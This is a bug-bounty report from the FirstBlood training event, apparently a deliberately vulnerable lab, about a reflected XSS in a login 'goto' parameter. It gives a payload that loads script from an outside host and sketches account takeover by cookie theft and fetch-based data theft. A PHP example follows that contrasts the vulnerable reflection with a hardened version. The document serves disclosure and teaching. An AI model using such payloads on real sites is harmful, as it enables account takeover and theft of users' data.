FirstBlood-#209 RXSS leads to ATO (account takeover)
This issue was discovered on FirstBlood v1.0.0



On 2021-05-12, prob_hakz Level 2 reported:

bug

rxss

visit http://firstbloodhackers.com:49571/login.php?goto=%22%3E%3Cscript/src=//14.rs%3E

impact

I have written a detailed report here of the impact of this short xss payload which is script inclusion https://www.bugbountyhunter.com/hackevents/report?id=200

In the above payload it is just only an alert.

But we can do whatever we want, like phishing, keystroke logging, account takeover by cookie stealing because there is no HttpOnly flag on the cookie, and we can also steal appointments and the entire source code with small AJAX snippets: fetch('//drpanel/index.php') and stealing the response, and also fetch('/drpanel/cancelled.php') and stealing the response with .then(response => response.text()).then(data => console.log(data)). Why does this fetch request work? Because it is giving an AJAX query to its own endpoints, so it works smoothly.

So it would be an easy attack.

The site accepts any script; there is no CORS here, which made this attack possible.

Because of script inclusion we can entirely attack the site as a bit attacker. Thanks for the hackevent, Sean.

P3 Rejected

Endpoint: /login.php?goto

Parameter: goto

Payload: "><script/src=//14.rs>
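The reported sink is a `goto` value reflected unescaped into login.php. The following is an added example, not FirstBlood's own source: the vulnerable reflection pattern next to a hardened version that encodes for the attribute context, restricts `goto` to a same-site path, and sets the session cookie flags the report notes are missing. The hidden-field markup and the `example.invalid` host are assumptions.

```php
<?php
// Added example (not FirstBlood's actual login.php). Demonstrates the
// unescaped "goto" reflection the report describes and a hardened form.

// --- Vulnerable pattern: the parameter is reflected verbatim ---
function render_goto_vulnerable(string $goto): string {
    // A value starting with "> closes the attribute and the tag, so the
    // remainder of the parameter is parsed as live HTML (script inclusion).
    return '<input type="hidden" name="goto" value="' . $goto . '">';
}

// --- Hardened: validate as a relative same-site path, then encode ---
function safe_goto(string $goto): string {
    // One leading slash, not two (blocks protocol-relative //host redirects),
    // followed only by ordinary path/query characters.
    if (!preg_match('#^/(?!/)[A-Za-z0-9_./?=&%-]*$#', $goto)) {
        return '/';  // anything else falls back to the site root
    }
    return $goto;
}

function render_goto_hardened(string $goto): string {
    // ENT_QUOTES encodes both " and ', so the value cannot leave the attribute.
    $value = htmlspecialchars(safe_goto($goto), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="goto" value="' . $value . '">';
}

// Cookie flags that reduce what an injected script can reach: HttpOnly keeps
// the session id out of document.cookie, Secure keeps it off plain HTTP.
// Injected script still runs as the origin and can call its own endpoints,
// so encoding at the sink (above) is the actual fix; this limits blast radius.
function start_hardened_session(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
    session_start();
}

// Constructed input with the same shape as the reported payload.
$input = '"><script/src=//example.invalid>';
echo render_goto_vulnerable($input), "\n";   // markup breaks out of the attribute
echo render_goto_hardened($input), "\n";     // value="/" : rejected by safe_goto
echo render_goto_hardened('/drpanel/index.php?x=1'), "\n";  // accepted, encoded
```

Run with `php` from the command line to compare the three rendered lines; only the first one produces a `<script>` tag.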